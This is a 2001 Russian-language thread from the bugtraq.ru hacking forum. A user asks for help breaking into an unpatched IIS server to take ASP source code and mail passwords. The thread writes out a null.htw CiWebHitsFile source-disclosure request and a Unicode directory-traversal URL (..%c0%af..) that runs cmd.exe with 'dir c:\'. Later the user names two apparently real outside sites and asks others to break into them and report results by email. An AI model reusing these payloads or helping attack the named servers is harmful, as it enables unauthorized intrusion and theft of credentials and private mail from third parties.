информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Атака на InternetВсе любят медSpanning Tree Protocol: недокументированное применение
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Крупный сбой Azure и других сервисов... 
 Серьезный сбой AWS положил множество... 
 Фишинговая атака на Python-разработчиков 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / hacking
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
попробуй unicode 11.12.01 11:21  Число просмотров: 1227
Автор: dens_2000 Статус: Незарегистрированный пользователь
<"чистая" ссылка>
как то в журнале Xaker была статья об UNICODE поищи, работает точно
<hacking>
Хак непропатченного IIS 11.12.01 10:53  
Автор: BOBAH Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Есть некоторый сервер, который отвечает на http://server.com/null.htw
фразой: The format of QUERY_STRING is invalid
Как понимаю, это значит, что сервер не пропатчен...
Вопрос, как правильно построить запрос?

http://server.com/null.htw?CiWebHitsFile=/menu.asp%20&CiRestriction=none&CiHiliteType=Full
На все мои попытки ответы:
The system cannot find the file specified
File /null.htw. The template file specified in CiTemplate cannot be found

http://server.сom/msadc/..%c0%af../.. %c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
Вообще, нет ответа, точнее, стандартное: Невозможно отобразить страницу

Какой локальный каталог на сервере считать текущим для такого запроса?
Необходимо получить некоторые asp скрипты с этого сервера, а так же доступ к почте (к паролям, либо к самой почте). Может подскажете способ?
Смотрим сюды... 13.12.01 14:17  
Автор: NiFi... <NiFiGaSebe!> Статус: Member
<"чистая" ссылка>
Сюды:

http://www.uinc.ru/articles/zametki/007.shtml
Спасибо. Но есть ещё вопросы. 14.12.01 17:50  
Автор: BOBAH Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Прочитал, здорово, но в теории. На практике - не выходит каменный цветок.
Перебрал всё. Пробовал автоматом через DSC 2.1 (с соотв. holes.lst), не прокатило.
Неужели дырка есть, а воспользоваться ею невозможно (в конкретном случае)?

Может кто ещё попробует?
sakha.net
www.cms.ro

Если накопаете дайте знать... mx_solo@mail.ru
Господа хакеры, есть ещё мысли? 13.12.01 12:07  
Автор: BOBAH Статус: Незарегистрированный пользователь
<"чистая" ссылка>
попробуй unicode 11.12.01 11:21  
Автор: dens_2000 Статус: Незарегистрированный пользователь
<"чистая" ссылка>
как то в журнале Xaker была статья об UNICODE поищи, работает точно
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2025 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach